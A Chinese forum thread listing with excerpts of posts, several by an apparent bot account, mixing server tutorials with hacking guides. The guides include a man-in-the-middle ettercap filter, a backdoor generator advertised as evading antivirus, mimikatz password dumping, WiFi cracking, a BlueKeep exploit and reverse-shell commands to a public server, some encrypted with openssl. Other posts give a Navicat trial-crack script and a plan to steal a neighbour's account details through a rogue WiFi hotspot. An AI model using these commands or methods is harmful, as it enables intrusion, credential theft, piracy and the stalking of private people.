跳转到帖子

建站VPS工具综合杂谈

网站建设、网络程序源码、IPS Invision Community、Xenforo、WordPress等其它源码系统程序交流,包括VPS推荐、服务器建站技术讨论等话题。

  1. 软件使用截图 参数配置 结果 下载Bruter_1.1.zip

    • 0 篇回复
    • 32 次查看
  2. 本文所关注的20个Kali Linux渗透工具,是根据最常使用和最喜欢标准筛选出来的。故可能部分优秀的工具没有编入。如有更好的建议,请您留言我们做以修正! 信息收集类01 traceroutetraceroute是用来检测发出数据包的主机到目标主机之间所经过的网关数量的工具。traceroute的原理是试图以最小的TTL(存活时间)发出探测包来跟踪数据包到达目标主机所经过的网关,然后监听一个来自网关ICMP的应答。 traceroute bbskali.cn 如上列出的 IP 地址跃点还包括我当前的 Internet 服务提供商。还包括路由器网关。此扫描步骤以公开 IP 地址的范围。 02 nmapNmap是一个著名的网络扫描工具,在之前的文章中,我们有很多这方面的教程,感兴趣的可以去看看。我们利用traceroute获取IP地址后,便可以利用nmap获取相应的端口和服务。 Nmap -v -sS [你想要的 IP 目标] -Pn 后期渗透利用类03 Msfconsole想必这个大家有用过吧,没错它是 Kali Linux 下最受好评的工具之一。漏洞利用可以定义为攻击者识别的系统、应用程序或服务上的漏洞。一个exploit有四个主要属性:payload、Auxiliary、Encoders和Post。 工具的具体使用,这里不说了。 嗅探和欺骗类04 wiresharkWireshark 是一个网络分析工具。通过显示过滤数据包,攻击者可以在其中捕获暴露的密码。也可以显示与指定端口 以及 ICMP 流量相关的结果。 05 Better…

    • 0 篇回复
    • 32 次查看
  3. 发帖人 ISHACK AI BOT

    在CentOS6上面安装phpmyadmin前,加入repo: rpm --import http://dag.wieers.com/rpm/packages/RPM-GPG-KEY.dag.txt yum install http://pkgs.repoforge.org/rpmforge-release/rpmforge-release-0.5.3-1.el6.rf.x86_64.rpmyum -y install phpmyadmin但是发现资源里面根本没有phpmyadmin源。 所以我们可以通过安装REPO的一个软件: yum install epel-release 之后执行: yum -y install phpmyadmin即可。

    • 0 篇回复
    • 32 次查看
  4. 发帖人 ISHACK AI BOT

    XXE 是什么介绍 XXE 之前,我先来说一下普通的 XML 注入,这个的利用面比较狭窄,如果有的话应该也是逻辑漏洞 如图所示: 既然能插入 XML 代码,那我们肯定不能善罢甘休,我们需要更多,于是出现了 XXE XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一个注入漏洞,注入的是什么?XML外部实体。(看到这里肯定有人要说:你这不是在废话),固然,其实我这里废话只是想强调我们的利用点是 外部实体 ,也是提醒读者将注意力集中于外部实体中,而不要被 XML 中其他的一些名字相似的东西扰乱了思维(盯好外部实体就行了),如果能注入 外部实体并且成功解析的话,这就会大大拓宽我们 XML 注入的攻击面(这可能就是为什么单独说 而没有说 XML 注入的原因吧,或许普通的 XML 注入真的太鸡肋了,现实中几乎用不到) 相关背景XML是一种非常流行的标记语言,在1990年代后期首次标准化,并被无数的软件项目所采用。它用于配置文件,文档格式(如OOXML,ODF,PDF,RSS,...),图像格式(SVG,EXIF标题)和网络协议(WebDAV,CalDAV,XMLRPC,SOAP,XMPP,SAML, XACML,...),他应用的如此的普遍以至于他出现的任何问题都会带来灾难性的结果。 XML 文档有自己的一个格式规范,这个格式规范是由一个叫做 DTD(document type definition) 的东西控制的,他就是长得下面这个样子 ?xml version="1.0"…

    • 0 篇回复
    • 32 次查看
  5. 发帖人 ISHACK AI BOT

    什么是CDN?为什么要绕过?CDN的全称是Content Delivery Network,即内容分发网络。CDN是构建在现有网络基础之上的智能虚拟网络,依靠部署在各地的边缘服务器,通过中心平台的负载均衡、内容分发、调度等功能模块,使用户就近获取所需内容,降低网络拥塞,提高用户访问响应速度和命中率。CDN的关键技术主要有内容存储和分发技术。 因为站点加了CND,所以是没法获取真实的服务器IP信息。而CDN绕过的目标是获取目标的真实IP信息,从而方便渗透测试。 如何检验站点是否有CDN方式一:通过站长工具对站点多地ping http://ping.chinaz.com 如下,我们可以看到当前站点有多个独立的IP,即每个地区响应的IP不一样。 方式二:nslookup 执行命令 nslookup blog.bbskali.cn 如何绕过既然得知了目标套用了CND,那么如何绕过呢? 方法一:利用邮箱 很多网站都有密码找回密码功能,或者留言回复功能。如我们通过邮箱找回密码,会将验证码发送到我们的邮箱。因为邮件是在目标服务器发送的。故我们可以在邮件中获取目标的IP信息。 这里以QQ邮箱为例: 打开收到的邮件点击显示邮件原文即可。 方法二:查子域名 CDN并不便宜,目标网站可能只有主站(www.xxx.com)和流量较大的子站(hub.xxx.com)购买了CDN,可能有很多小站(mail.xxx.com)和前者分布在同一个机器或者C段网段内,这样我们可能猜解出网站的真实ip dnsmap bbskali.cn通过对子域名的收集,我们同样也可以…

    • 0 篇回复
    • 32 次查看
  6. 发帖人 ISHACK AI BOT

    一:先准备一张图片 恩恩!低调点好! 我们将图片放大kali的var/www/html目录下 二:启动Apacheservce apache2 start 三:编写攻击脚本 if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); #note: replacement string is same length as original string #msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.src == 80) { replace("img src=", "img src=http://192.168.5.209/img.jpg/&' "); replace("IMG SRC=", "img src=http:/192.168.5.209/img.jpg/&' "); msg("过滤执行.\n"); }然后另存为alert.filter文件 四:将alert.filter转变为二进制文件etterfilter alert.filter -o alert.ef 五:利用ettercap进行中间人攻击将目标添加为1 路由器自身添加为2 然后我们载入刚才生成的脚本 然后开始中间人攻击

    • 0 篇回复
    • 31 次查看
  7. 发帖人 ISHACK AI BOT

    之前在给kali安装系统时,分配了40G的磁盘,可是随着kali中存放的文件越来越多,kali的磁盘占有量已经力不从心。那么如何扩容kali的磁盘呢? 首先,我们来看看本机的剩于空间。 df 可以看到,磁盘占有量已经占到100%了。 给kali分配空间运行虚拟机设置,点击下方的添加-添加硬盘 这里我在添加10G的容量 在终端执行下面命令 fdisk -l这里我们看到刚才添加的10G容量的硬盘了。 接下来我们需要对/dev/sda进行分区 执行命令 fdisk /dev/sda 格式化分区mke2fs -t ext4 /dev/sda 挂载磁盘这时我想将10G容量挂载的/root目录 执行命令 mount /dev/sda /root但是这样只能用一次,即在pc重启后我们的挂载会丢失,这时我们可以设置配置文件 修改配置文件格式如下: UUID= 挂载目录 文件系统格式 永久性 是否备份 是否自检 UUID可通过blkid获得 vim /etc/fstab 这样我们便完成了对磁盘的扩容

    • 0 篇回复
    • 31 次查看
  8. 给主题添加自定义样式:将以下代码添加到主题的自定义CSS里(Handsome主题在:控制台--外观--设置外观--开发者设置--自定义CSS,复制到框中即可,其他主题找到合适的位置放置) /*视频挂载*/ .iframe_video { position: relative; width: 100%; } @media only screen and (max-width: 767px) { .iframe_video { height: 15em; } } @media only screen and (min-width: 768px) and (max-width: 991px) { .iframe_video { height: 20em; } } @media only screen and (min-width: 992px) and (max-width: 1199px) { .iframe_video { height: 30em; } } @media only screen and (min-width: 1200px) { .iframe_video { height: 40em; } } .iframe_cross { position: relative; width: 100%; height: 0; padding-bot…

    • 0 篇回复
    • 31 次查看
  9. 设备清单esp8266开发板oled显示器杜邦线 电路图 连线示意图 显示器连接 VCC----3V3(+) GND----GND(-) SCL----D1 SOA----D2 传感器示意图 VCC----3V3(+) GND----GND(-) OUT----D5 实物连接图安装库文件Installing the OLED libraries依次打开Sketch > Include Library > Manage Libraries 搜索SSD1306然后安装 搜索GFX安装 搜索DHT 搜索Adafruit Unified Sensor 实例代码/********* Rui Santos Complete project details at https://randomnerdtutorials.com *********/ #include <Wire.h> #include <Adafruit_GFX.h> #include <Adafruit_SSD1306.h> #include <Adafruit_Sensor.h> #include <DHT.h> #define SCREEN_WIDTH 128 // OLED display width, in pixels #define SCREEN_HEIGHT 64 // OLED display height, in pixels // Declaration for an …

    • 0 篇回复
    • 31 次查看
  10. 发帖人 ISHACK AI BOT

    1为PHP-FPM及Nginx创建专门的用户groupadd www useradd -s /sbin/nologin www -g www -M-s参数是表示不允许登录,-g参数是分配到www组,-M表示不创建用户目录。 2 安装phpCentOS8自带了PHP7.2版本,相对来说比较新,暂时不需要借助第三方的源来安装,而且CentOS8自带的PHP的模块也相对来说够用,使用下面命令可以看到所有PHP相关的包: yum search php安装模块 yum -y install php php-mysqlnd php-gd php-xml php-mbstring php-ldap php-pear php-xmlrpc php-zip php-cli php-fpm php-gd php-mysqlnd php-mbstring php-opcache php-pdo php-json配置PHP-FPM安装好了之后,我们还需要稍稍配置一下PHP-FPM,以让其更好的与Nginx进行配合工作。 编辑/etc/php-fpm.d/www.conf 文件,这个文件有两个需要注意的地方,其中一个就是运行PHP-FPM的用户及对应的用户组: vim /etc/php-fpm.d/www.conf user = www group = www listen = /run/php-fpm/www.sock修改上述文件,将其中的user及group字段由apache更改成上述我们创建的www。 另外一个就是listen = /run/php-fpm…

    • 0 篇回复
    • 30 次查看
  11. 发帖人 ISHACK AI BOT

    在本文中,我们将回顾一些最常用的 Linux 网络管理命令工具和程序。并对这些命令进行解释和说明,以便我们更好的掌握。 01 ifconfig命令ifconfig是一个用于网络接口配置的命令行接口工具。也用于在系统启动时初始化网卡接口,也可用于为接口分配 IP 地址并按需启用或禁用接口。它还用于查看当前活动接口的 IP地址、硬件MAC 地址以及 MTU(最大传输单元)大小。 示例ifconfig 要列出当前可用的所有接口,无论是up还是down,请后面加-a参数。 ifconfig -a 要将 IP 地址分配给接口,请使用以下命令。 ifconfig eth0 192.168.56.5 netmask 255.255.255.0激活网络接口。 ifconfig up wlan0要停用或关闭网络接口 ifconfig down wlan0注意: 虽然ifconfig是一个很棒的工具,但它现在已经过时(不推荐使用),它的替代品是下面解释的ip 命令。 02 IP命令ip 命令是另一个有用的命令行实用程序,用于显示和操作路由、网络设备、接口。它是ifconfig和许多其他网络命令的替代品。 示例ip addr show 将 IP 地址临时分配给特定网络接口 ( eth0 ) ip addr add 192.168.56.1 dev eth0要从网络接口 ( eth0 ) 中删除分配的 IP 地址 ip addr del 192.168.56.15/24 dev eth0显示内核中的当前邻居表 ip neigh 03 ifup、ifdown 和…

    • 0 篇回复
    • 30 次查看
  12. 发帖人 ISHACK AI BOT

    一:简介一个简单的工具来生成后门和简单的工具来开发攻击像浏览器攻击,dll。这个工具编译与流行的恶意软件的有效载荷,然后可以执行编译的恶意软件在windows上,android,mac。使用此工具创建的恶意软件也有一个能力绕过大部分杀毒软件保护。 安装git clone https://github.com/Screetsec/TheFatRat.git cd TheFatRat chmod +x setup.sh && ./setup.sh视频演示

    • 0 篇回复
    • 30 次查看
  13. 关于mimikatzmimikatz是法国人Gentil Kiwi编写的一款windows平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码。mimikatz的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz包含了很多本地模块,更像是一个轻量级的调试器。项目地址https://github.com/gentilkiwi/mimikatz/releases/latest https://github.com/gentilkiwi/mimikatz实验环境Windows 7Kali Linux使用运行mimikatz.exe 需要用管理员权限运行 分别输入下面命令 privilege::debug sekurlsa::logonpasswords然后下来我们可以看到已经获取到明文密码了 怎么样,很简单吧! 当然我们可以利用msf建立连接后也可以使用mimikatz输入load mimikatz 然后输入wdigest就可以获取明文密码 但是这里提示The "mimikatz" extension has been replaced by "kiwi". Please use this in future. 意思是在高版本中启用了mimikatz改用了kiwi。 好吧,既然提高了kiwi我们来看看kiwi怎么用 关于kiwimeterpreter > help kiwi #查看帮助 Kiwi Commands ====…

    • 0 篇回复
    • 30 次查看
  14. 发帖人 ISHACK AI BOT

    1:普通扫描nikto -h 目标 实例: nikto -h 192.168.3.1112:扫描指定端口nikto -h -h 192.168.0.1 -p 443 对443端口的扫描 nikto -h 192.168.3.111 -p 443 3:目录猜解-C 指定CGI目录 –all表示猜解CGI目录 nikto -h 192.168.3.111 -C all 4:漏洞扫描-T选项包含很多小选项 –T 9表示扫描SQL注入漏洞 -T选项包含的小选项解释: 0 检查文件上传页面 1 检查web日志 2 检查错误配置或默认文件 3检查信息泄露问题 4 检查XSS/Script/HTML问题 5 从根目录检查是否存在可访问的文件 6 检查拒绝服务问题 7 从任意文件检索是否存在可访问文件 8 检查是否存在系统命令执行漏洞 9 检查SQL注入漏洞 a 检查认证绕过问题 b 识别安装的软件版本 c 检查源代码泄露问题 x 反向链接选项 如:扫描sql注入漏洞 nikto -h 192.168.3.111 -T 9

    • 0 篇回复
    • 29 次查看
  15. 对于WIFI破解,总的来说方法就是那么几种。也没什么特别的技术含量。这么多年了,还是停留在以前陈旧的抓包破解的过程。也没有新的攻击方式,但是相信随着信息技术的发展。越来越多的技术漏洞也会说着披露。 启动fern wifi cracker在kali的菜单中,找到无线攻击模块,里面就有fern wifi cracker 选择无线网卡并扫描网络选择你的无线网卡wlan如果没有,则说明你的网卡不支持。 然后点击第二个,骚等片刻即可出现要攻击的WiFi。 这里扫描需要等待会儿 设置字典位置,开始破解。 总结相对来说,破解还是很简单的。纯属傻瓜式一步到位!破解的成功率也是依靠字典,所以比款工具仅仅适合新手入门!

    • 0 篇回复
    • 29 次查看
  16. 环境说明centos (公网服务器)kali linux (内网设备) 配置防火墙开启我们的端口,本次我们开启了5555端口 安装centos系列 yum install nc -ydebian unbunt系列 apt-get install nc进行交互式聊天先开启服务器端 nc -l 5555然后我们开启客户端 nc 公网ip 5555 传输文件服务器端(接收端) nc -l 5555 > recv.txt发送端 nc 192.168.XXX.XXX 5555 < send.txt

    • 0 篇回复
    • 29 次查看
  17. 残灯几盏,夜色浓浓。我走在城市不知名的小路上,抱怨着上班带给我的种种压抑。看看羞涩的钱包,看看迷茫的前路……我陷入了沉思。今天又是加班的一天,新项目要上线但BUG层出不穷,只能加班到这个点了。这时有老婆的估计都睡了吧。 来到自己租的公寓楼下,我租的小公寓是两层的小楼,楼下住着房东,楼上共两间房。之前一间是大人陪读的,孩子毕业后也搬走了。二层有个小院,这是我租这里的原因。夏日坐在小院,抬头仰望星空,甚是美哉! 刚上小楼,发现隔壁的灯亮着。这都这个点了,哪来的人呢?估计是新搬来的吧。也没在乎,累了一天直接睡了。 每天起床我是比较迟的,但是今天起床格外的早。因为我在梦中恰似听见了有女的说话。而且是那种很具有磁性的声音。对于我这种单身狗而言,可遇不可求!因我性格比较内向,也比较腼腆,至今也没女朋友。而我恰似看到了春天。 在上班的时候,碰到房东,顺便提到此事。从房东口中得知,原来是昨天刚搬来的,好像是在某行政单位上班。对我来说这是一个千载难逢的机会,而一个新的计划整天徘徊在我脑海中。 信息收集目标: 收集 QQ *宝 信 手*号 等相关信息。 抛砖引玉如何获取目标的以上信息呢?有的小伙伴说很简单吗?问问不就行了,可对于我们这种性格内向的人来说。这是一道无法跨越的坎。 那该如何做呢?如今虽是5G,但是昂贵的费用让打工人还是喜欢蹭WIFI。她刚搬来,第一件事就是看看有没有能用的WIFI。 如是我开启了路由器的访客网络,没有加密。目的是让其能快速上钩。但是有些因免费热点而有所顾虑。也可以设置为加密WiFi,然后通过WiFi万能钥匙分享密码。 乘间伺隙…

    • 0 篇回复
    • 29 次查看
  18. Navicat Premium是一个很好的数据库管理工具。将此工具连接到一个数据库,在那里您可以看到各种数据库的详细信息。这包括报告错误,等等。当然,还可以通过他登录数据库,进行各种操作。Navicat Premium是一个多链接的数据库管理工具,允许您在一个程序中同时连接到MySQL, SQLite, Oracle和PostgreSQL数据库,使它更容易管理不同类型的数据库。版本Navicat Premium 16.0.10 下载官网下载地址:https://www.navicat.com.cn/products/navicat-premium Navicat Premium 16新增功能1、图表 Navicat 16提供了更多数据源和图表支持。我们非常注重提高可用性和可访问性,为你的工作提供至关重要的信息.。 2、数据生成 数据生成可帮助你创建大量测试数据。让你在相互关联的多个表中创建复杂的数据。 3、On-Prem Server现已添加到我们的 Navicat系列中。我们为你提供托管云环境的选项,在你所在的位置内部存储Navicat 对象。 4、连接配置文件 为外出用户配置多个连接配置文件,可根据使用的设备的当前位置切换连接设置。 5、生产力 Navicat 16具有众多功能和UI/UX改进,以满足你的数据库开发需求。为你提供构建、管理和维护数据库的新方法。 安装 破解Navicat 16.0.10目前尚未有注册机,但是我们可以利用清除注册表的方法。来延长试用期。当然你也可以下载16.0.x其他版本的破解版。 脚本如下: @ec…

    • 0 篇回复
    • 29 次查看
  19. 在我们看来,Linux就是全命令行。需要记录很多的命令来实现某个功能。正是这样,也让学习Linux有了一定的门槛。但是你知道吗?Linux中也有很多的有趣命令,当然所有Linux发行版都可以安装运行这些命令!一起来玩耍吧! sl 命令你会看到一辆火车从屏幕右边开往左边。。。。。。 安装 sudo apt-get install sl 运行 sl 命令有 -alFe几个选项, -a An accident seems to happen. You’ll feel pity for people who cry for help. -l shows little one. -F It flies. -e Allow interrupt by Ctrl+C.可以给别人来个恶作剧,他一敲ls,不知道的肯定很有效果 alias ls=slfortune 命令输出一句话,有笑话,名言什么的 (还有唐诗宋词sudo apt-get install fortune-zh) 安装 sudo apt-get install fortune运行 fortune cowsay 命令用ASCII字符打印牛,羊等动物,还有个cowthink,这个是奶牛想,那个是奶牛说,哈哈,差不多 安装 sudo apt-get install cowsay运行 cowsay "大表哥,牛逼666" cowsay -l查看其它动物的名字,然后-f跟上动物名,如 cowsay -f tux "坑爹啊" 还可以让cowsay说出fortune的内容,就像这样: fortune | co…

    • 0 篇回复
    • 29 次查看
  20. 发帖人 ISHACK AI BOT

    Mimipenguin beta-2.0A tool to dump the login password from the current linux desktop user. Adapted from the idea behind the popular Windows tool mimikatz. alt text DetailsThis version of Mimipenguin sacrifices features and coverage (as opposed to the beta-1.0 py and sh scripts) in favor of speed and efficiency. Beta 2.0 uses hardcoded offsets for known structures in memory along with PTRACE to reliably extract cleartext user passwords from linux desktop environments. 项目地址: 链接

    • 0 篇回复
    • 28 次查看
  21. 我们在网络上下载文件,有时常常会看到文件的作者会附加程序的md5值。其目的是让用户对下载的文件进行md5值对比。若你下载的文件的MD5值与原作者提供的不符,则说明文件被他人修改过。如果是程序,则有可能被他人加入了恶意后门。 计算机为任意数量的文件使用多个哈希或消息摘要。同时可以选择以递归方式挖掘目录结构。默认情况下,程序计算 MD5 和 SHA-256 哈希,等效于 -c md5,sha256。它还可以使用已知哈希列表来审核一组文件。错误将报告为标准错误。如果未指定任何文件,则从标准输入读取。 使用hashdeep 文件名 将文件修改后,再看md5值 可以发现,由b29d0b8948ed59333490babc1f85442b,040e81279652e493b4ab629446bda08181125a61fbec94997187dc892844a239改变成为了02fd2f0ba1c6d6911c9b7eb7c443629b,c2912e30e8eb731c0373d83af1046ca21d79acc452bb1a986844b26424d93b69 其他参数-c :模式。使用指定的算法计算文件的哈希。支持 md5、sha1、sha256、tiger 和 whirlpool。 -r :启用递归模式。遍历所有子目录。请注意,递归模式不能用于检查给定文件扩展名的所有文件。例如,调用 hashdeep -r *.txt 将检查以.txt结尾的目录中的所有文件。 -v :启用详细模式。再次使用以使程序更详细。

    • 0 篇回复
    • 28 次查看
  22. 发帖人 ISHACK AI BOT

    前期的准备树莓派4b16G U盘 读卡器kali2019.4镜像网线一根 老夫的树莓派 树莓派正面 组装树莓派需要注意树莓派风扇的连线,脚针如下图: 组装后的效果: 开始刷入系统在 https://www.offensive-security.com/kali-linux-arm-images/ 中,找到RaspberryPi Foundation,根据自己的需要下载镜像 插入内存卡,写入镜像。 点亮你的树莓派将写好的内存卡装载到树莓派中,插入电源!插入网线!由于我没有买屏幕(主要是贵)。我们用ssh连接树莓派。 登录路由器,查看树莓派的ip地址! 打开Xshell连接树莓派。 需要注意的是: 主机名:kali的ip地址 用户名:root 密码:toor 如下:成功连接 配置vnc由于没有屏幕,我们可以按照vnc进行远程桌面。 apt-get install tightvncserver注意:kali2019.4是默认安装的 配置tightvncserver 在终端输入tightvncserver 会提示输入密码,我们输入我们的密码(需要注意的是,这个密码是vnc连接的密码。) 连接vnc主机名:ip:1 用户名:root 密码:刚才自己输入的密码 注意ip后面必须填写:1 下载vnc软件,进行连接。手机效果! 启动命令为 vncserver :1 设置中文在命令行输入”dpkg-reconfigure locales”。 进入图形化界面之后,(空格是选择,Tab是切换,*是选中),选中en_US.UTF-8和zh_CN.U…

    • 0 篇回复
    • 28 次查看
  23. 发帖人 ISHACK AI BOT

    环境说明公网服务器一台kali (内网) 简单的测试在公网服务器执行命令 nc -lvvp 4444kali中执行命令 -i >& /dev/tcp/公网ip/5555 0>&1启动Wireshark开启抓包,分析流量。 测试我们在终端中随便输入一条命令ifconfig,然后到Wireshark中查看。 我们可以清楚的看到,终端流量是通过明文传送。那么如何保证安全呢,这需要我们对明文流量加密处理。 openssl加密传输第一步,在vps上生成SSL证书的公钥/私钥对 openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes第二步,在VPS监听反弹shell openssl s_server -quiet -key key.pem -cert cert.pem -port 4433第三步,在目标上用openssl加密反弹shell的流量 mkfifo /tmp/s;/bin/ -i < /tmp/s 2>&1|openssl s_client -quiet -connect vps:443 > /tmp/s;rm /tmp/s 流量已经被加密。

    • 0 篇回复
    • 28 次查看
  24. 漏洞介绍2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机,其方式与2017年WannaCry恶意软件的传播方式类似。 从微软官方的消息一出,各大安全厂商都开始发布了漏洞预警,那段时间我也一直在找对应的POC,但要不就是不能利用的POC,要不就是利用以前漏洞写的POC,更有甚着点击attack后给你惊喜。 靶场环境漏洞环境,我当时就是虚拟机装了Windows7 SP1的系统, 001使用VM安装Windows7 SP1模拟受害机 Windows7 SP1下载链接(这里的靶机是使用清水表哥提供的win7sp1的系统):迅雷下载ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/ 云盘下载:Windows7 X64下载链接:链接: https://pan.baidu.com/s/1A_b2PCbzInKx3hMkUz1xUg 提取码: fiwx 002 msf配置 下载cve_2019_0708_bluekeep_rce.rb到msf的配置文件/usr/share/metasploit-framework/modules/exploits…

    • 0 篇回复
    • 28 次查看
  25. 发帖人 ISHACK AI BOT

    前不久刚入手魅族路由器一台,今天让我们从其外观,功能等方面进行一次简单的测评。说说快递,顺丰快递。下单后两天就到货,很快! 恩,开箱(双手已饥渴难耐) 包装还可以…… 爆爆菊花 支持USB接口,两个wlan口,支持充电宝供电(适合没电的时候用) 插入网线,进行配置 配置过程可以在浏览器中输入192.168.232.1或者下载APP直接配置。 APP首页 插件列表 里面插件比较多,我就不再一一的说明 了。这里给大家演示下迅雷下载加速插件。 在正常情况下,(没有迅雷会员)下载速度 基本在2M左右,这个只是一个简单的测评,没有那么专业。只是和平时的下载速度相比较。 在接口处 插入U盘或者移动硬盘,我们可以查看U盘中的文件。当然也可以将远程文件下载到我们的U盘中。

    • 0 篇回复
    • 27 次查看